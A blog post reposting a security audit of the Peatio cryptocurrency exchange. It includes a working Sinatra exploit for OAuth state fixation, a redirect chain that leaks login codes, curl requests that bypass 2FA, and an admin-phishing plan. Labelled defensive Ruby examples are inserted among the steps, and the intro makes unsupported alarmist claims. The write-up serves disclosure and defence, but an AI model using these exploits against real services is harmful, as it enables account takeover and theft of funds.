ItsBlockchain
Beware! Your Bitcoins can be stolen at any point of time

by Hitesh Malviya
March 4, 2020
in bitcoin, Cryptocurrency

There are around 2630 cryptocurrency exchanges available, and the list grows with each passing day. Which exchange should you choose to store your crypto assets? If you follow the Bitcoin space, you must have heard about the hacking attack on the top Bitcoin exchange Bitfinex last year.

If the best exchange could be hacked, how sure can we be about the others? This is an eye-opener post about the security of these exchanges. 75% of exchanges are still vulnerable to cyber attack and can be hacked at any point of time. You may all be waiting for the Bitcoin price to go down; wait, my friend, one such cyber attack and the Bitcoin price will fall drastically.

In this post I am going to present a case study on Bitcoin hacking done by Sakurity. The rest of the post is their writeup.

UPDATE: Once again – no one was hacked in reality and the audit was conducted for free. This post is simply an attack scenario. You can download the final report and see clarifications here.

For a while we've been looking for a project on which to conduct a volunteer security audit. Recently we found a perfect fit: Peatio, an open source cryptocurrency exchange powered by Rails.

We dedicated 8 hours to finding a way to do the worst thing you can do to a Bitcoin exchange: steal the hot wallet. The mission was partially accomplished, and we found an interesting chain of critical vulnerabilities.

Step 1. Hijacking the account

Peatio has a "Connect Weibo account" feature built in. According to the OAuth Security Cheatsheet, a poorly implemented OAuth flow is a reliable way to take over an account.

Connecting the attacker's Weibo account to the victim's Peatio account

The omniauth-weibo-oauth2 gem was vulnerable to state fixation: the request phase accepts a client-supplied state value instead of generating its own. We can set state to an arbitrary value (e.g. 123), start the flow in the victim's browser so that 123 is stored in the victim's session, and then deliver the attacker's authorization code together with state=123 to the callback. The state check passes and the attacker's Weibo account is attached to the victim's Peatio account. The exact same issue existed in the omniauth-facebook gem and in other omniauth-based libraries that copy-pasted the same vulnerable code. Ironically, the comment in the gem's source says "to support omniauth-oauth2's auto csrf protection" while the code does the opposite and switches it off.

The bug can be exploited with the following Sinatra app; just add YourWeiboCookies (the attacker's own Weibo session cookies):

require 'sinatra'
require 'faraday'   # HTTP client used to replay the Weibo authorize request with the attacker's cookies

# Attacker-hosted endpoint. It performs the Weibo authorize request with the
# ATTACKER's Weibo session, so the resulting code belongs to the attacker, and
# then bounces the victim's browser to Peatio's callback with that code and the
# fixed state=123.
get '/get_weibo_cb' do
  conn = Faraday.new(:url => 'https://api.weibo.com')
  new_url = conn.get do |r|
    r.url "/oauth2/authorize?client_id=456519107&redirect_uri=https%3A%2F%2Fyunbi.com%2Fauth%2Fweibo%2Fcallback&response_type=code&state=123"

    # Paste the attacker's own Weibo cookies here
    r.headers['Cookie'] =<<COOKIE
YourWeiboCookies
COOKIE

    r.options.timeout = 4
    r.options.open_timeout = 2
  end.headers["Location"]   # Faraday does not follow redirects: this is Weibo's redirect to the Peatio callback
  redirect new_url
end

# Page the victim visits. The first image makes the victim's Peatio session
# store state=123; the CSP stops the browser from following Peatio's redirect
# on to api.weibo.com, so the victim's own Weibo account is never involved.
# The second image hits /get_weibo_cb above and lands on the Peatio callback
# with the attacker's code and the matching state=123.
get '/peatio_demo' do
  response.headers['Content-Security-Policy'] = "img-src 'self' https://yunbi.com"
  "<img src='https://yunbi.com/auth/weibo?state=123'><img src='/get_weibo_cb'>"
end
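To make the state fixation concrete, here is an added example (not code from the post, Sakurity or the omniauth gems) that models the request phase and callback phase of an OAuth client as plain Ruby functions over hash-based sessions. The vulnerable variant copies a client-supplied state into the session, as the post describes; the hardened variant always generates its own. attack_succeeds? replays the two-step attack above against either variant. The function names, the session key "omniauth.state" and the state length are assumptions.

```ruby
require 'securerandom'

# Hypothetical, minimal model of an OAuth client's request phase and callback
# phase. Session and params are plain hashes so this runs without Rails/Sinatra.

# Constant-time string comparison so the state check does not leak a byte
# position through timing.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Vulnerable request phase, modelled on the behaviour the post describes: a
# client-supplied params["state"] is written into the session, so whoever
# starts the flow chooses the value the callback will later accept.
def vulnerable_request_phase(session, params)
  session["omniauth.state"] = params["state"] || SecureRandom.hex(24)
  session["omniauth.state"]
end

# Hardened request phase: the state is always generated server-side from a
# CSPRNG and the client cannot influence it.
def safe_request_phase(session, _params = {})
  session["omniauth.state"] = SecureRandom.hex(24)
  session["omniauth.state"]
end

# Callback phase shared by both variants. The stored state is consumed (single
# use) and compared in constant time with the state echoed back by the
# provider. Returns true when the callback may proceed.
def callback_state_valid?(session, params)
  expected = session.delete("omniauth.state")
  given = params["state"]
  return false if expected.nil? || given.nil?
  constant_time_equal?(expected, given)
end

# Replays the attack from the post against a request-phase implementation:
# (1) the victim's browser is made to start the flow with state=123,
# (2) the victim's browser is sent to the callback with the ATTACKER's code
#     and the same state=123.
# Returns true when the attacker's code would be accepted, i.e. the attacker's
# provider account would be linked to the victim's account.
def attack_succeeds?(request_phase)
  victim_session = {}
  request_phase.call(victim_session, { "state" => "123" })
  callback_state_valid?(victim_session, { "state" => "123", "code" => "ATTACKER_CODE" })
end

if $PROGRAM_NAME == __FILE__
  puts "fixation against vulnerable client: #{attack_succeeds?(method(:vulnerable_request_phase))}"
  puts "fixation against hardened client:   #{attack_succeeds?(method(:safe_request_phase))}"
end
```

The second half of the fix, consuming the state on first use, is what keeps a leaked callback URL from being replayed; the hardened variant still accepts a genuine callback exactly once.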
What if the user already has Weibo connected?

The system is not going to connect another Weibo account, but we wanted the exploit to work seamlessly for every possible victim. So we hacked Weibo's OAuth.

First, we found out that Weibo doesn't whitelist redirect_uri, just as GitHub didn't. It's possible to change redirect_uri to another page on the victim domain, leak the code through the Referer header, and then use it to log in to the victim's account.

However, there was no such page on Peatio to make it leak: no external images, links or anything. The attack surface was tiny. But then we found this in DocumentsController:

# Redirects to whatever Referer the browser sent, without checking its origin
if not @doc
  redirect_to(request.referer || root_path)
  return
end
      

The following chain of redirects leaks the code by first putting it into the # fragment (%23 is the URL-encoded # inside redirect_uri):

1. attacker_page redirects to weibo.com/authorize?...redirect_uri=https://app/documents/not_existing_doc%23...
2. Weibo doesn't properly parse redirect_uri and redirects the victim to https://app/documents/not_existing_doc#?code=VALID_CODE
3. Peatio cannot find not_existing_doc and sends back a Location header equal to request.referer, which is still attacker_page (the browser retains the Referer header across redirects)
4. The browser preserves the #?code=VALID_CODE fragment and loads attacker_page#?code=VALID_CODE. Now the code can be read with JS from location.hash. The code can be used against https://app/auth/weibo/callback to log in to the victim's account.

Using the two bugs above we can hijack any Peatio account; only the second one requires JS.
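Both halves of that chain have a simple check that would have broken it. The following is an added example, not code from Peatio, Weibo or Sakurity: redirect_uri_allowed? is the provider-side exact-match check that Weibo lacked, and safe_referer_redirect is a same-origin replacement for the redirect_to(request.referer || root_path) line in DocumentsController. The origin https://app.example, the registered callback and the function names are assumptions.

```ruby
require 'uri'

# Assumed application origin and registered callback; not Peatio's real config.
APP_ORIGIN = "https://app.example".freeze
REGISTERED_REDIRECT_URIS = ["https://app.example/auth/weibo/callback"].freeze

# Normalises a URI into the components that matter for redirect_uri matching.
def redirect_key(uri)
  [uri.scheme.to_s.downcase, uri.host.to_s.downcase, uri.port, uri.path]
end

# Provider-side check: the redirect_uri supplied in the authorize request must
# exactly match a registered URI. Fragments, query strings and "nearby" paths on
# the same host are all rejected, so a value such as
# https://app.example/documents/not_existing_doc%23 never reaches the victim domain.
def redirect_uri_allowed?(requested, registered = REGISTERED_REDIRECT_URIS)
  uri = URI.parse(requested)
  return false unless uri.is_a?(URI::HTTPS)
  return false unless uri.fragment.nil? && uri.query.nil?
  registered.any? { |r| redirect_key(URI.parse(r)) == redirect_key(uri) }
rescue URI::InvalidURIError
  false
end

# Application-side replacement for `redirect_to(request.referer || root_path)`:
# a Referer is only honoured when it is on our own origin, otherwise the user
# goes to root_path. Returns the value that would be placed in Location.
def safe_referer_redirect(referer, own_origin: APP_ORIGIN, root_path: "/")
  return root_path if referer.nil? || referer.empty?
  ref = URI.parse(referer)
  own = URI.parse(own_origin)
  same_origin = ref.scheme == own.scheme && ref.host == own.host && ref.port == own.port
  return root_path unless same_origin
  ref.path.to_s.empty? ? root_path : ref.path
rescue URI::InvalidURIError
  root_path
end

if $PROGRAM_NAME == __FILE__
  puts redirect_uri_allowed?("https://app.example/auth/weibo/callback")
  puts redirect_uri_allowed?("https://app.example/documents/not_existing_doc%23")
  puts safe_referer_redirect("https://attacker.example/page")
end
```

With the same-origin rule in place, step 3 of the chain sends the victim to /, and the fragment carrying the code is dropped on our own page instead of being delivered to attacker_page.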

Step 2: Bypassing 2 Factor Authentication

For users with Google Authenticator activated

There's a gaping hole in SmsAuthsController: two_factor_required! is only called for the show action, but not for update, which is the action actually responsible for activating SMS 2FA.

before_action :auth_member!
before_action :find_sms_auth
before_action :activated?
before_action :two_factor_required!, only: [:show]   # update is not covered

def show
  @phone_number = Phonelib.parse(current_user.phone_number).national
end

# Reachable without passing the existing 2FA check
def update
  if params[:commit] == 'send_code'
    send_code_phase
  else
    verify_code_phase
  end
end

We can activate a new SMS authenticator simply by sending the following requests straight to the update action (the first request triggers the SMS to our own phone number, the second submits the code we received):

curl 'https://app/verify/sms_auth' -H 'X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=' -H 'Cookie:_peatio_session=SID' --data '_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5Bphone_number%5D=9123222211&commit=send_code'

curl 'https://app/verify/sms_auth' -H 'X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=' -H 'Cookie:_peatio_session=SID' --data '_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5Bphone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED'

For users with both Authenticator and SMS

Peatio doesn't record failed OTP attempts, so it's very easy to brute-force both the app and SMS OTPs; it takes less than 3 days. For more details check our OTP Bruteforce Calculator.

For users with SMS 2FA only

The two_factor_by_type method doesn't use the activated scope, so even inactive 2FA models can be used. We are not going to brute-force the SMS auth, because the victim would start receiving suspicious SMS messages. We can still brute-force the (inactive) Google Authenticator, because it already has a seed generated and its verify? method works fine.

def two_factor_by_type
  current_user.two_factors.by_type(params[:id])   # no activated scope: inactive records are returned too
end

Furthermore, SMS 2FA has two more issues:

def gen_code
  self.otp_secret = OTP_LENGTH.times.map{ Random.rand(9) + 1 }.join   # Mersenne Twister, digits 1..9 only
  self.refreshed_at = Time.now
end

The first issue is that Random.rand is based on a non-cryptographic PRNG (Mersenne Twister), which becomes predictable once an attacker has observed enough consecutive outputs.

The second issue is that rand(9) + 1 can only produce the digits 1 to 9, so the total number of combinations is 9^6 = 531441, roughly half of 1,000,000 and therefore about twice as easy to brute-force as the app 2FA.

With the tricks outlined above we can bypass 2FA for any user. In the worst case it takes less than 3 days. If the victim has only Google Authenticator, it takes less than 5 seconds to set up a new SMS authenticator.
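The three OTP weaknesses above (no failed-attempt accounting, a Mersenne Twister source, and a 9-symbol alphabet) are easy to measure. The following is an added example, not Peatio's or Sakurity's code: weak_gen_code reproduces the gen_code logic from the post, strong_gen_code is a CSPRNG replacement with the full 0..9 alphabet, keyspace and expected_bruteforce_seconds give the numbers behind the "twice as easy" claim for any guess rate, and OtpVerifier is the missing failed-attempt lockout. OTP_LENGTH = 6, the lockout threshold and the guess rate used in the usage block are assumptions.

```ruby
require 'securerandom'

OTP_LENGTH = 6   # assumed; matches a 6-digit SMS/app code

# Weak generator reproduced from the post: Random.rand(9) + 1 yields only the
# digits 1..9, and Random is a Mersenne Twister, not a CSPRNG.
def weak_gen_code
  OTP_LENGTH.times.map { Random.rand(9) + 1 }.join
end

# Hardened generator: CSPRNG, full 0..9 alphabet, fixed width (leading zeros kept).
def strong_gen_code
  SecureRandom.random_number(10**OTP_LENGTH).to_s.rjust(OTP_LENGTH, "0")
end

# Number of distinct codes for an alphabet of the given size.
def keyspace(alphabet_size, length = OTP_LENGTH)
  alphabet_size**length
end

# Expected number of guesses to hit a fixed code is half the keyspace; at `rps`
# attempts per second with no lockout, this is the time an attacker needs.
def expected_bruteforce_seconds(space, rps)
  (space / 2.0) / rps
end

# Verifier that records failed attempts: after `max_failures` wrong codes the
# factor is locked and every further guess, including the correct one, is
# rejected until an out-of-band reset.
class OtpVerifier
  attr_reader :failures

  def initialize(secret, max_failures: 5)
    @secret = secret
    @max_failures = max_failures
    @failures = 0
  end

  def locked?
    @failures >= @max_failures
  end

  def verify(code)
    return false if locked?
    if same_code?(@secret, code.to_s)
      @failures = 0
      true
    else
      @failures += 1
      false
    end
  end

  private

  # Constant-time comparison so a correct prefix cannot be detected via timing.
  def same_code?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

if $PROGRAM_NAME == __FILE__
  rps = 100.0   # assumed guess rate against an endpoint with no lockout
  puts "weak code: #{weak_gen_code}  strong code: #{strong_gen_code}"
  puts "9^6  = #{keyspace(9)}   expected #{(expected_bruteforce_seconds(keyspace(9), rps) / 3600).round(1)} h at #{rps.to_i}/s"
  puts "10^6 = #{keyspace(10)}  expected #{(expected_bruteforce_seconds(keyspace(10), rps) / 3600).round(1)} h at #{rps.to_i}/s"
end
```

Note that the lockout is the decisive fix: with a ceiling of a handful of attempts per code, the difference between 9^6 and 10^6 stops mattering, and the generator change then only removes the predictability of the Mersenne Twister output.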

Step 3: Attacking the admin

Alright, we can hijack the account and bypass 2FA for any user, so we can steal the Bitcoins of anyone who visits our page. Still, we would need to trick a lot of users into clicking our phishy links. Let's focus on just one of them: the admin.

The simplest way to make the admin visit our link is to create a support ticket with something like "What is wrong with my account, can you please check? https://i.will.hack.you/now". Then we hack 2FA to get into the /admin panel.

Unfortunately, this is the worst part. The admin of Peatio can do just a few more things than a regular user. Nothing like "Send all the coins to this bad guy" or "Show API keys of all users":

  can :update, Proof
  can :manage, Document
  can :manage, Member
  can :manage, Ticket
  can :manage, IdDocument
  can :manage, TwoFactor
  can :menu, Deposit
  can :manage, Deposit
  can :manage, ::Deposits::Bank
  can :manage, ::Deposits::Satoshi
  can :menu, Withdraw
  can :manage, ::Withdraws::Bank
  can :manage, ::Withdraws::Satoshi

The only thing we found is creating a fiat deposit of, say, 99999999 Chinese Yuan and then accepting it as the admin.

Then we can buy all available Bitcoins and altcoins and withdraw them. However, not all Bitcoins are on orders. Doing it in stealth mode for a week can bring better results than closing all the orders in a rush.
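The reason a single hijacked admin session is enough here is that the ability list above lets any admin both create and accept a fiat deposit, with no second pair of eyes and no amount ceiling. The following is an added example, not Peatio's model or policy code, of a maker-checker rule for fiat deposit acceptance: the creator of a deposit can never approve it, two distinct admins are required, and a per-deposit cap rejects the 99999999 CNY case outright. The Deposit fields, the limit table and the approval count are assumptions.

```ruby
# Hypothetical fiat deposit record and approval policy. This is not Peatio's
# code; field names, limits and the two-approver rule are assumptions.
Deposit = Struct.new(:id, :member_id, :amount, :currency, :created_by,
                     :state, :approvals, keyword_init: true)

PER_DEPOSIT_FIAT_LIMIT = { "CNY" => 500_000 }.freeze   # assumed cap per deposit
REQUIRED_APPROVALS = 2                                  # four-eyes principle

def new_fiat_deposit(id:, member_id:, amount:, currency:, created_by:)
  Deposit.new(id: id, member_id: member_id, amount: amount, currency: currency,
              created_by: created_by, state: "submitted", approvals: [])
end

# Attempts to record an approval by `admin`. Returns a symbol describing the
# outcome. The deposit only becomes "accepted" once REQUIRED_APPROVALS distinct
# admins, none of whom created it, have approved and the amount is under the cap.
def approve_deposit!(deposit, admin)
  return :not_pending unless deposit.state == "submitted"
  limit = PER_DEPOSIT_FIAT_LIMIT[deposit.currency]
  return :unknown_currency if limit.nil?
  return :exceeds_limit if deposit.amount > limit
  return :separation_of_duties if admin == deposit.created_by
  return :already_approved if deposit.approvals.include?(admin)

  deposit.approvals << admin
  if deposit.approvals.length >= REQUIRED_APPROVALS
    deposit.state = "accepted"
    :accepted
  else
    :pending
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed scenario: the compromised admin "alice" books the post's deposit.
  big = new_fiat_deposit(id: 1, member_id: 7, amount: 99_999_999, currency: "CNY", created_by: "alice")
  puts "alice approves 99999999 CNY: #{approve_deposit!(big, 'alice')}"
  small = new_fiat_deposit(id: 2, member_id: 7, amount: 1_000, currency: "CNY", created_by: "alice")
  puts "alice approves own 1000 CNY: #{approve_deposit!(small, 'alice')}"
  puts "bob approves:                #{approve_deposit!(small, 'bob')}"
  puts "carol approves:              #{approve_deposit!(small, 'carol')}  state=#{small.state}"
end
```

Under this rule the attacker needs two independent admin sessions rather than one, and even then cannot push a single oversized deposit through; the cap forces many smaller deposits, which is exactly the kind of pattern a reconciliation job against the bank ledger should flag.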

Yunbi assets: 1636 BTC in total and ~350 in the hot wallet.

Our bounty: 1 BTC. It wasn't about the money though.

Finally, the report is available to download.
